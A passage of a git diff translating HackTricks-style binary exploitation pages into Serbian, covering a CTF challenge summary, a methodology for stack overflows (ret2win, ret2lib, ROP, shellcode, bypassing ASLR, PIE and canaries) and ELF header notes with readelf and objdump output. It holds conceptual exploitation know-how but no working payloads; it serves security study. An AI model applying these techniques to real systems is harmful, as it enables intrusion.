ovaj lanac na steku). Na kraju se koristi novi ROP lanac koji izvršava ret2lib. - [https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html](https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html) - - 32 bit, no relro, no canary, nx, pie. Abuse a bad indexing to leak addresses of libc and heap from the stack. Abuse the buffer overflow o do a ret2lib calling `system('/bin/sh')` (the heap address is needed to bypass a check). +- 32 bita, bez relro, bez kanara, nx, pie. Iskoristite loše indeksiranje da procurite adrese libc i heap-a iz steka. Iskoristite buffer overflow da uradite ret2lib pozivajući `system('/bin/sh')` (adresa heap-a je potrebna da bi se zaobišla provera). diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md index a5e59ae40..b44157cc5 100644 --- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md +++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md @@ -1,111 +1,111 @@ -# Basic Binary Exploitation Methodology +# Osnovna Metodologija Eksploatacije Binarnih Datoteka {{#include ../../banners/hacktricks-training.md}} -## ELF Basic Info +## Osnovne Informacije o ELF-u -Before start exploiting anything it's interesting to understand part of the structure of an **ELF binary**: +Pre nego što počnete sa eksploatacijom bilo čega, zanimljivo je razumeti deo strukture **ELF binarne datoteke**: {{#ref}} elf-tricks.md {{#endref}} -## Exploiting Tools +## Alati za Eksploataciju {{#ref}} tools/ {{#endref}} -## Stack Overflow Methodology +## Metodologija Stack Overflow-a -With so many techniques it's good to have a scheme when each technique will be useful. Note that the same protections will affect different techniques. You can find ways to bypass the protections on each protection section but not in this methodology. +Sa toliko tehnika, dobro je imati shemu kada će svaka tehnika biti korisna. Imajte na umu da će iste zaštite uticati na različite tehnike. Možete pronaći načine da zaobiđete zaštite u svakoj sekciji zaštite, ali ne u ovoj metodologiji. -## Controlling the Flow +## Kontrola Tokova -There are different was you could end controlling the flow of a program: +Postoje različiti načini na koje možete kontrolisati tok programa: -- [**Stack Overflows**](../stack-overflow/) overwriting the return pointer from the stack or the EBP -> ESP -> EIP. - - Might need to abuse an [**Integer Overflows**](../integer-overflow.md) to cause the overflow -- Or via **Arbitrary Writes + Write What Where to Execution** - - [**Format strings**](../format-strings/)**:** Abuse `printf` to write arbitrary content in arbitrary addresses. - - [**Array Indexing**](../array-indexing.md): Abuse a poorly designed indexing to be able to control some arrays and get an arbitrary write. - - Might need to abuse an [**Integer Overflows**](../integer-overflow.md) to cause the overflow - - **bof to WWW via ROP**: Abuse a buffer overflow to construct a ROP and be able to get a WWW. +- [**Stack Overflows**](../stack-overflow/) prepisivanjem povratne adrese iz steka ili EBP -> ESP -> EIP. +- Možda će biti potrebno da zloupotrebite [**Integer Overflows**](../integer-overflow.md) da izazovete prelivanje +- Ili putem **Arbitrary Writes + Write What Where to Execution** +- [**Format strings**](../format-strings/)**:** Zloupotreba `printf` za pisanje proizvoljnog sadržaja na proizvoljne adrese. +- [**Array Indexing**](../array-indexing.md): Zloupotreba loše dizajniranog indeksiranja kako biste mogli kontrolisati neke nizove i dobiti proizvoljno pisanje. +- Možda će biti potrebno da zloupotrebite [**Integer Overflows**](../integer-overflow.md) da izazovete prelivanje +- **bof to WWW via ROP**: Zloupotreba prelivanja bafera za konstrukciju ROP-a i mogućnost dobijanja WWW. -You can find the **Write What Where to Execution** techniques in: +Možete pronaći tehnike **Write What Where to Execution** u: {{#ref}} ../arbitrary-write-2-exec/ {{#endref}} -## Eternal Loops +## Večne Petlje -Something to take into account is that usually **just one exploitation of a vulnerability might not be enough** to execute a successful exploit, specially some protections need to be bypassed. Therefore, it's interesting discuss some options to **make a single vulnerability exploitable several times** in the same execution of the binary: +Nešto što treba uzeti u obzir je da obično **samo jedna eksploatacija ranjivosti možda neće biti dovoljna** za izvršenje uspešne eksploatacije, posebno neke zaštite treba zaobići. Stoga, zanimljivo je raspraviti o nekim opcijama za **učiniti jednu ranjivost eksploatabilnom više puta** u istoj izvršnoj instanci binarne datoteke: -- Write in a **ROP** chain the address of the **`main` function** or to the address where the **vulnerability** is occurring. - - Controlling a proper ROP chain you might be able to perform all the actions in that chain -- Write in the **`exit` address in GOT** (or any other function used by the binary before ending) the address to go **back to the vulnerability** -- As explained in [**.fini_array**](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md#eternal-loop)**,** store 2 functions here, one to call the vuln again and another to call**`__libc_csu_fini`** which will call again the function from `.fini_array`. +- Pisanje u **ROP** lancu adrese **`main` funkcije** ili na adresu gde se **ranjivost** dešava. +- Kontrolisanjem odgovarajućeg ROP lanca možda ćete moći da izvršite sve akcije u tom lancu +- Pisanje u **`exit` adresu u GOT** (ili bilo kojoj drugoj funkciji koju koristi binarna datoteka pre završetka) adrese za **povratak na ranjivost** +- Kao što je objašnjeno u [**.fini_array**](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md#eternal-loop)**,** ovde čuvajte 2 funkcije, jednu za ponovno pozivanje ranjivosti i drugu za pozivanje **`__libc_csu_fini`** koja će ponovo pozvati funkciju iz `.fini_array`. -## Exploitation Goals +## Ciljevi Eksploatacije -### Goal: Call an Existing function +### Cilj: Pozvati Postojeću funkciju -- [**ret2win**](./#ret2win): There is a function in the code you need to call (maybe with some specific params) in order to get the flag. - - In a **regular bof without** [**PIE**](../common-binary-protections-and-bypasses/pie/) **and** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/) you just need to write the address in the return address stored in the stack. - - In a bof with [**PIE**](../common-binary-protections-and-bypasses/pie/), you will need to bypass it - - In a bof with [**canary**](../common-binary-protections-and-bypasses/stack-canaries/), you will need to bypass it - - If you need to set several parameter to correctly call the **ret2win** function you can use: - - A [**ROP**](./#rop-and-ret2...-techniques) **chain if there are enough gadgets** to prepare all the params - - [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/) (in case you can call this syscall) to control a lot of registers - - Gadgets from [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) and [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) to control several registers - - Via a [**Write What Where**](../arbitrary-write-2-exec/) you could abuse other vulns (not bof) to call the **`win`** function. -- [**Pointers Redirecting**](../stack-overflow/pointer-redirecting.md): In case the stack contains pointers to a function that is going to be called or to a string that is going to be used by an interesting function (system or printf), it's possible to overwrite that address. - - [**ASLR**](../common-binary-protections-and-bypasses/aslr/) or [**PIE**](../common-binary-protections-and-bypasses/pie/) might affect the addresses. -- [**Uninitialized vatiables**](../stack-overflow/uninitialized-variables.md): You never know. +- [**ret2win**](./#ret2win): Postoji funkcija u kodu koju treba pozvati (možda sa nekim specifičnim parametrima) kako biste dobili zastavicu. +- U **običnom bof-u bez** [**PIE**](../common-binary-protections-and-bypasses/pie/) **i** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/) samo treba da upišete adresu u povratnu adresu smeštenu u steku. +- U bof-u sa [**PIE**](../common-binary-protections-and-bypasses/pie/), moraćete da je zaobiđete +- U bof-u sa [**canary**](../common-binary-protections-and-bypasses/stack-canaries/), moraćete da je zaobiđete +- Ako treba da postavite nekoliko parametara da biste ispravno pozvali funkciju **ret2win**, možete koristiti: +- [**ROP**](./#rop-and-ret2...-techniques) **lanac ako ima dovoljno gadgeta** da pripremite sve parametre +- [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/) (u slučaju da možete pozvati ovaj syscall) da kontrolišete mnogo registara +- Gadgeti iz [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) i [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) za kontrolu više registara +- Putem [**Write What Where**](../arbitrary-write-2-exec/) mogli biste zloupotrebiti druge ranjivosti (ne bof) da pozovete funkciju **`win`**. +- [**Pointers Redirecting**](../stack-overflow/pointer-redirecting.md): U slučaju da stek sadrži pokazivače na funkciju koja će biti pozvana ili na string koji će koristiti zanimljiva funkcija (system ili printf), moguće je prepisati tu adresu. +- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) ili [**PIE**](../common-binary-protections-and-bypasses/pie/) mogu uticati na adrese. +- [**Neinicijalizovane promenljive**](../stack-overflow/uninitialized-variables.md): Nikad ne znate. -### Goal: RCE +### Cilj: RCE -#### Via shellcode, if nx disabled or mixing shellcode with ROP: +#### Putem shellcode-a, ako je nx onemogućen ili mešanjem shellcode-a sa ROP-om: -- [**(Stack) Shellcode**](./#stack-shellcode): This is useful to store a shellcode in the stack before of after overwriting the return pointer and then **jump to it** to execute it: - - **In any case, if there is a** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/)**,** in a regular bof you will need to bypass (leak) it - - **Without** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **and** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md) it's possible to jump to the address of the stack as it won't never change - - **With** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) you will need techniques such as [**ret2esp/ret2reg**](../rop-return-oriented-programing/ret2esp-ret2reg.md) to jump to it - - **With** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md), you will need to use some [**ROP**](../rop-return-oriented-programing/) **to call `memprotect`** and make some page `rwx`, in order to then **store the shellcode in there** (calling read for example) and then jump there. - - This will mix shellcode with a ROP chain. +- [**(Stack) Shellcode**](./#stack-shellcode): Ovo je korisno za skladištenje shellcode-a u steku pre ili posle prepisivanja povratne adrese i zatim **skakanja na njega** da ga izvršite: +- **U svakom slučaju, ako postoji** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/)**,** u običnom bof-u moraćete da je zaobiđete (leak) +- **Bez** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **i** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md) moguće je skočiti na adresu steka jer se nikada neće promeniti +- **Sa** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) moraćete koristiti tehnike kao što su [**ret2esp/ret2reg**](../rop-return-oriented-programing/ret2esp-ret2reg.md) da biste skočili na njega +- **Sa** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md), moraćete da koristite neki [**ROP**](../rop-return-oriented-programing/) **da pozovete `memprotect`** i učinite neku stranicu `rwx`, kako biste zatim **smestili shellcode tamo** (pozivajući read na primer) i zatim skočili tamo. +- Ovo će pomešati shellcode sa ROP lancem. -#### Via syscalls +#### Putem syscalls -- [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/): Useful to call `execve` to run arbitrary commands. You need to be able to find the **gadgets to call the specific syscall with the parameters**. - - If [**ASLR**](../common-binary-protections-and-bypasses/aslr/) or [**PIE**](../common-binary-protections-and-bypasses/pie/) are enabled you'll need to defeat them **in order to use ROP gadgets** from the binary or libraries. - - [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/) can be useful to prepare the **ret2execve** - - Gadgets from [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) and [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) to control several registers +- [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/): Korisno za pozivanje `execve` da izvrši proizvoljne komande. Morate biti u mogućnosti da pronađete **gadgete za pozivanje specifičnog syscall-a sa parametrima**. +- Ako su [**ASLR**](../common-binary-protections-and-bypasses/aslr/) ili [**PIE**](../common-binary-protections-and-bypasses/pie/) omogućeni, moraćete da ih savladate **da biste koristili ROP gadgete** iz binarne datoteke ili biblioteka. +- [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/) može biti koristan za pripremu **ret2execve** +- Gadgeti iz [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) i [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) za kontrolu više registara -#### Via libc +#### Putem libc -- [**Ret2lib**](../rop-return-oriented-programing/ret2lib/): Useful to call a function from a library (usually from **`libc`**) like **`system`** with some prepared arguments (e.g. `'/bin/sh'`). You need the binary to **load the library** with the function you would like to call (libc usually). - - If **statically compiled and no** [**PIE**](../common-binary-protections-and-bypasses/pie/), the **address** of `system` and `/bin/sh` are not going to change, so it's possible to use them statically. - - **Without** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **and knowing the libc version** loaded, the **address** of `system` and `/bin/sh` are not going to change, so it's possible to use them statically. - - With [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **but no** [**PIE**](../common-binary-protections-and-bypasses/pie/)**, knowing the libc and with the binary using the `system`** function it's possible to **`ret` to the address of system in the GOT** with the address of `'/bin/sh'` in the param (you will need to figure this out). - - With [ASLR](../common-binary-protections-and-bypasses/aslr/) but no [PIE](../common-binary-protections-and-bypasses/pie/), knowing the libc and **without the binary using the `system`** : - - Use [**`ret2dlresolve`**](../rop-return-oriented-programing/ret2dlresolve.md) to resolve the address of `system` and call it - - **Bypass** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) and calculate the address of `system` and `'/bin/sh'` in memory. - - **With** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **and** [**PIE**](../common-binary-protections-and-bypasses/pie/) **and not knowing the libc**: You need to: - - Bypass [**PIE**](../common-binary-protections-and-bypasses/pie/) - - Find the **`libc` version** used (leak a couple of function addresses) - - Check the **previous scenarios with ASLR** to continue. +- [**Ret2lib**](../rop-return-oriented-programing/ret2lib/): Korisno za pozivanje funkcije iz biblioteke (obično iz **`libc`**) kao što je **`system`** sa nekim pripremljenim argumentima (npr. `'/bin/sh'`). Potrebno je da binarna datoteka **učita biblioteku** sa funkcijom koju želite da pozovete (libc obično). +- Ako je **staticki kompajlirana i bez** [**PIE**](../common-binary-protections-and-bypasses/pie/), **adresa** `system` i `/bin/sh` se neće menjati, tako da ih je moguće koristiti statički. +- **Bez** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **i znajući verziju libc** koja je učitana, **adresa** `system` i `/bin/sh` se neće menjati, tako da ih je moguće koristiti statički. +- Sa [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **ali bez** [**PIE**](../common-binary-protections-and-bypasses/pie/)**, znajući libc i sa binarnom datotekom koja koristi funkciju `system`** moguće je **`ret` na adresu system u GOT** sa adresom `'/bin/sh'` u parametru (to ćete morati da otkrijete). +- Sa [ASLR](../common-binary-protections-and-bypasses/aslr/) ali bez [PIE](../common-binary-protections-and-bypasses/pie/), znajući libc i **bez binarne datoteke koja koristi `system`** : +- Koristite [**`ret2dlresolve`**](../rop-return-oriented-programing/ret2dlresolve.md) da rešite adresu `system` i pozovete je +- **Zaobiđite** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) i izračunajte adresu `system` i `'/bin/sh'` u memoriji. +- **Sa** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **i** [**PIE**](../common-binary-protections-and-bypasses/pie/) **i ne znajući libc**: Morate: +- Zaobići [**PIE**](../common-binary-protections-and-bypasses/pie/) +- Pronaći **`libc` verziju** koja se koristi (leak nekoliko adresa funkcija) +- Proveriti **prethodne scenarije sa ASLR** da nastavite. -#### Via EBP/RBP +#### Putem EBP/RBP -- [**Stack Pivoting / EBP2Ret / EBP Chaining**](../stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md): Control the ESP to control RET through the stored EBP in the stack. - - Useful for **off-by-one** stack overflows - - Useful as an alternate way to end controlling EIP while abusing EIP to construct the payload in memory and then jumping to it via EBP +- [**Stack Pivoting / EBP2Ret / EBP Chaining**](../stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md): Kontrola ESP-a da kontrolišete RET putem smeštenog EBP-a u steku. +- Korisno za **off-by-one** stack overflows +- Korisno kao alternativni način da završite kontrolu EIP-a dok zloupotrebljavate EIP za konstrukciju payload-a u memoriji i zatim skakanje na njega putem EBP-a -#### Misc +#### Razno -- [**Pointers Redirecting**](../stack-overflow/pointer-redirecting.md): In case the stack contains pointers to a function that is going to be called or to a string that is going to be used by an interesting function (system or printf), it's possible to overwrite that address. - - [**ASLR**](../common-binary-protections-and-bypasses/aslr/) or [**PIE**](../common-binary-protections-and-bypasses/pie/) might affect the addresses. -- [**Uninitialized variables**](../stack-overflow/uninitialized-variables.md): You never know +- [**Pointers Redirecting**](../stack-overflow/pointer-redirecting.md): U slučaju da stek sadrži pokazivače na funkciju koja će biti pozvana ili na string koji će koristiti zanimljiva funkcija (system ili printf), moguće je prepisati tu adresu. +- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) ili [**PIE**](../common-binary-protections-and-bypasses/pie/) mogu uticati na adrese. +- [**Neinicijalizovane promenljive**](../stack-overflow/uninitialized-variables.md): Nikad ne znate {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md index f5886ddcc..f4edb44d9 100644 --- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md +++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md @@ -1,11 +1,10 @@ -# ELF Basic Information +# ELF Osnovne Informacije {{#include ../../banners/hacktricks-training.md}} ## Program Headers -The describe to the loader how to load the **ELF** into memory: - +Oni opisuju loader-u kako da učita **ELF** u memoriju: ```bash readelf -lW lnstat @@ -14,80 +13,78 @@ Entry point 0x1c00 There are 9 program headers, starting at offset 64 Program Headers: - Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align - PHDR 0x000040 0x0000000000000040 0x0000000000000040 0x0001f8 0x0001f8 R 0x8 - INTERP 0x000238 0x0000000000000238 0x0000000000000238 0x00001b 0x00001b R 0x1 - [Requesting program interpreter: /lib/ld-linux-aarch64.so.1] - LOAD 0x000000 0x0000000000000000 0x0000000000000000 0x003f7c 0x003f7c R E 0x10000 - LOAD 0x00fc48 0x000000000001fc48 0x000000000001fc48 0x000528 0x001190 RW 0x10000 - DYNAMIC 0x00fc58 0x000000000001fc58 0x000000000001fc58 0x000200 0x000200 RW 0x8 - NOTE 0x000254 0x0000000000000254 0x0000000000000254 0x0000e0 0x0000e0 R 0x4 - GNU_EH_FRAME 0x003610 0x0000000000003610 0x0000000000003610 0x0001b4 0x0001b4 R 0x4 - GNU_STACK 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW 0x10 - GNU_RELRO 0x00fc48 0x000000000001fc48 0x000000000001fc48 0x0003b8 0x0003b8 R 0x1 +Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align +PHDR 0x000040 0x0000000000000040 0x0000000000000040 0x0001f8 0x0001f8 R 0x8 +INTERP 0x000238 0x0000000000000238 0x0000000000000238 0x00001b 0x00001b R 0x1 +[Requesting program interpreter: /lib/ld-linux-aarch64.so.1] +LOAD 0x000000 0x0000000000000000 0x0000000000000000 0x003f7c 0x003f7c R E 0x10000 +LOAD 0x00fc48 0x000000000001fc48 0x000000000001fc48 0x000528 0x001190 RW 0x10000 +DYNAMIC 0x00fc58 0x000000000001fc58 0x000000000001fc58 0x000200 0x000200 RW 0x8 +NOTE 0x000254 0x0000000000000254 0x0000000000000254 0x0000e0 0x0000e0 R 0x4 +GNU_EH_FRAME 0x003610 0x0000000000003610 0x0000000000003610 0x0001b4 0x0001b4 R 0x4 +GNU_STACK 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW 0x10 +GNU_RELRO 0x00fc48 0x000000000001fc48 0x000000000001fc48 0x0003b8 0x0003b8 R 0x1 - Section to Segment mapping: - Segment Sections... - 00 - 01 .interp - 02 .interp .note.gnu.build-id .note.ABI-tag .note.package .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame - 03 .init_array .fini_array .dynamic .got .data .bss - 04 .dynamic - 05 .note.gnu.build-id .note.ABI-tag .note.package - 06 .eh_frame_hdr - 07 - 08 .init_array .fini_array .dynamic .got +Section to Segment mapping: +Segment Sections... +00 +01 .interp +02 .interp .note.gnu.build-id .note.ABI-tag .note.package .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame +03 .init_array .fini_array .dynamic .got .data .bss +04 .dynamic +05 .note.gnu.build-id .note.ABI-tag .note.package +06 .eh_frame_hdr +07 +08 .init_array .fini_array .dynamic .got ``` - -The previous program has **9 program headers**, then, the **segment mapping** indicates in which program header (from 00 to 08) **each section is located**. +Prethodni program ima **9 zaglavlja programa**, zatim, **mapiranje segmenata** ukazuje u kojem zaglavlju programa (od 00 do 08) **se nalazi svaka sekcija**. ### PHDR - Program HeaDeR -Contains the program header tables and metadata itself. +Sadrži tabele zaglavlja programa i samu metapodatke. ### INTERP -Indicates the path of the loader to use to load the binary into memory. +Ukazuje putanju učitavača koji treba koristiti za učitavanje binarnog fajla u memoriju. ### LOAD -These headers are used to indicate **how to load a binary into memory.**\ -Each **LOAD** header indicates a region of **memory** (size, permissions and alignment) and indicates the bytes of the ELF **binary to copy in there**. +Ova zaglavlja se koriste za označavanje **kako učitati binarni fajl u memoriju.**\ +Svako **LOAD** zaglavlje označava region **memorije** (veličina, dozvole i poravnanje) i ukazuje na bajtove ELF **binarne datoteke koje treba kopirati tamo**. -For example, the second one has a size of 0x1190, should be located at 0x1fc48 with permissions read and write and will be filled with 0x528 from the offset 0xfc48 (it doesn't fill all the reserved space). This memory will contain the sections `.init_array .fini_array .dynamic .got .data .bss`. +Na primer, drugo ima veličinu od 0x1190, treba da bude locirano na 0x1fc48 sa dozvolama za čitanje i pisanje i biće popunjeno sa 0x528 sa ofseta 0xfc48 (ne popunjava sav rezervisani prostor). Ova memorija će sadržati sekcije `.init_array .fini_array .dynamic .got .data .bss`. ### DYNAMIC -This header helps to link programs to their library dependencies and apply relocations. Check the **`.dynamic`** section. +Ovo zaglavlje pomaže u povezivanju programa sa njihovim zavisnostima biblioteka i primeni relokacija. Proverite sekciju **`.dynamic`**. ### NOTE -This stores vendor metadata information about the binary. +Ovo čuva informacije o metapodacima dobavljača o binarnom fajlu. ### GNU_EH_FRAME -Defines the location of the stack unwind tables, used by debuggers and C++ exception handling-runtime functions. +Definiše lokaciju tabela za odmotavanje steka, koje koriste debageri i C++ funkcije za rukovanje izuzecima. ### GNU_STACK -Contains the configuration of the stack execution prevention defense. If enabled, the binary won't be able to execute code from the stack. +Sadrži konfiguraciju zaštite od izvršavanja na steku. Ako je omogućeno, binarni fajl neće moći da izvršava kod sa steka. ### GNU_RELRO -Indicates the RELRO (Relocation Read-Only) configuration of the binary. This protection will mark as read-only certain sections of the memory (like the `GOT` or the `init` and `fini` tables) after the program has loaded and before it begins running. +Ukazuje na RELRO (Relocation Read-Only) konfiguraciju binarnog fajla. Ova zaštita će označiti kao samo za čitanje određene sekcije memorije (kao što su `GOT` ili `init` i `fini` tabele) nakon što se program učita i pre nego što počne da se izvršava. -In the previous example it's copying 0x3b8 bytes to 0x1fc48 as read-only affecting the sections `.init_array .fini_array .dynamic .got .data .bss`. +U prethodnom primeru kopira 0x3b8 bajtova na 0x1fc48 kao samo za čitanje, utičući na sekcije `.init_array .fini_array .dynamic .got .data .bss`. -Note that RELRO can be partial or full, the partial version do not protect the section **`.plt.got`**, which is used for **lazy binding** and needs this memory space to have **write permissions** to write the address of the libraries the first time their location is searched. +Napomena da RELRO može biti delimičan ili potpun, delimična verzija ne štiti sekciju **`.plt.got`**, koja se koristi za **lenjo povezivanje** i treba ovaj prostor u memoriji da ima **dozvole za pisanje** da bi zapisala adresu biblioteka kada se prvi put traži njihova lokacija. ### TLS -Defines a table of TLS entries, which stores info about thread-local variables. +Definiše tabelu TLS unosa, koja čuva informacije o lokalnim promenljivama niti. -## Section Headers - -Section headers gives a more detailed view of the ELF binary +## Zaglavlja sekcija +Zaglavlja sekcija daju detaljniji pregled ELF binarnog fajla. ``` objdump lnstat -h @@ -95,159 +92,153 @@ lnstat: file format elf64-littleaarch64 Sections: Idx Name Size VMA LMA File off Algn - 0 .interp 0000001b 0000000000000238 0000000000000238 00000238 2**0 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 1 .note.gnu.build-id 00000024 0000000000000254 0000000000000254 00000254 2**2 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 2 .note.ABI-tag 00000020 0000000000000278 0000000000000278 00000278 2**2 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 3 .note.package 0000009c 0000000000000298 0000000000000298 00000298 2**2 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 4 .gnu.hash 0000001c 0000000000000338 0000000000000338 00000338 2**3 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 5 .dynsym 00000498 0000000000000358 0000000000000358 00000358 2**3 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 6 .dynstr 000001fe 00000000000007f0 00000000000007f0 000007f0 2**0 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 7 .gnu.version 00000062 00000000000009ee 00000000000009ee 000009ee 2**1 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 8 .gnu.version_r 00000050 0000000000000a50 0000000000000a50 00000a50 2**3 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 9 .rela.dyn 00000228 0000000000000aa0 0000000000000aa0 00000aa0 2**3 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 10 .rela.plt 000003c0 0000000000000cc8 0000000000000cc8 00000cc8 2**3 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 11 .init 00000018 0000000000001088 0000000000001088 00001088 2**2 - CONTENTS, ALLOC, LOAD, READONLY, CODE - 12 .plt 000002a0 00000000000010a0 00000000000010a0 000010a0 2**4 - CONTENTS, ALLOC, LOAD, READONLY, CODE - 13 .text 00001c34 0000000000001340 0000000000001340 00001340 2**6 - CONTENTS, ALLOC, LOAD, READONLY, CODE - 14 .fini 00000014 0000000000002f74 0000000000002f74 00002f74 2**2 - CONTENTS, ALLOC, LOAD, READONLY, CODE - 15 .rodata 00000686 0000000000002f88 0000000000002f88 00002f88 2**3 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 16 .eh_frame_hdr 000001b4 0000000000003610 0000000000003610 00003610 2**2 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 17 .eh_frame 000007b4 00000000000037c8 00000000000037c8 000037c8 2**3 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 18 .init_array 00000008 000000000001fc48 000000000001fc48 0000fc48 2**3 - CONTENTS, ALLOC, LOAD, DATA - 19 .fini_array 00000008 000000000001fc50 000000000001fc50 0000fc50 2**3 - CONTENTS, ALLOC, LOAD, DATA - 20 .dynamic 00000200 000000000001fc58 000000000001fc58 0000fc58 2**3 - CONTENTS, ALLOC, LOAD, DATA - 21 .got 000001a8 000000000001fe58 000000000001fe58 0000fe58 2**3 - CONTENTS, ALLOC, LOAD, DATA - 22 .data 00000170 0000000000020000 0000000000020000 00010000 2**3 - CONTENTS, ALLOC, LOAD, DATA - 23 .bss 00000c68 0000000000020170 0000000000020170 00010170 2**3 - ALLOC - 24 .gnu_debugaltlink 00000049 0000000000000000 0000000000000000 00010170 2**0 - CONTENTS, READONLY - 25 .gnu_debuglink 00000034 0000000000000000 0000000000000000 000101bc 2**2 - CONTENTS, READONLY +0 .interp 0000001b 0000000000000238 0000000000000238 00000238 2**0 +CONTENTS, ALLOC, LOAD, READONLY, DATA +1 .note.gnu.build-id 00000024 0000000000000254 0000000000000254 00000254 2**2 +CONTENTS, ALLOC, LOAD, READONLY, DATA +2 .note.ABI-tag 00000020 0000000000000278 0000000000000278 00000278 2**2 +CONTENTS, ALLOC, LOAD, READONLY, DATA +3 .note.package 0000009c 0000000000000298 0000000000000298 00000298 2**2 +CONTENTS, ALLOC, LOAD, READONLY, DATA +4 .gnu.hash 0000001c 0000000000000338 0000000000000338 00000338 2**3 +CONTENTS, ALLOC, LOAD, READONLY, DATA +5 .dynsym 00000498 0000000000000358 0000000000000358 00000358 2**3 +CONTENTS, ALLOC, LOAD, READONLY, DATA +6 .dynstr 000001fe 00000000000007f0 00000000000007f0 000007f0 2**0 +CONTENTS, ALLOC, LOAD, READONLY, DATA +7 .gnu.version 00000062 00000000000009ee 00000000000009ee 000009ee 2**1 +CONTENTS, ALLOC, LOAD, READONLY, DATA +8 .gnu.version_r 00000050 0000000000000a50 0000000000000a50 00000a50 2**3 +CONTENTS, ALLOC, LOAD, READONLY, DATA +9 .rela.dyn 00000228 0000000000000aa0 0000000000000aa0 00000aa0 2**3 +CONTENTS, ALLOC, LOAD, READONLY, DATA +10 .rela.plt 000003c0 0000000000000cc8 0000000000000cc8 00000cc8 2**3 +CONTENTS, ALLOC, LOAD, READONLY, DATA +11 .init 00000018 0000000000001088 0000000000001088 00001088 2**2 +CONTENTS, ALLOC, LOAD, READONLY, CODE +12 .plt 000002a0 00000000000010a0 00000000000010a0 000010a0 2**4 +CONTENTS, ALLOC, LOAD, READONLY, CODE +13 .text 00001c34 0000000000001340 0000000000001340 00001340 2**6 +CONTENTS, ALLOC, LOAD, READONLY, CODE +14 .fini 00000014 0000000000002f74 0000000000002f74 00002f74 2**2 +CONTENTS, ALLOC, LOAD, READONLY, CODE +15 .rodata 00000686 0000000000002f88 0000000000002f88 00002f88 2**3 +CONTENTS, ALLOC, LOAD, READONLY, DATA +16 .eh_frame_hdr 000001b4 0000000000003610 0000000000003610 00003610 2**2 +CONTENTS, ALLOC, LOAD, READONLY, DATA +17 .eh_frame 000007b4 00000000000037c8 00000000000037c8 000037c8 2**3 +CONTENTS, ALLOC, LOAD, READONLY, DATA +18 .init_array 00000008 000000000001fc48 000000000001fc48 0000fc48 2**3 +CONTENTS, ALLOC, LOAD, DATA +19 .fini_array 00000008 000000000001fc50 000000000001fc50 0000fc50 2**3 +CONTENTS, ALLOC, LOAD, DATA +20 .dynamic 00000200 000000000001fc58 000000000001fc58 0000fc58 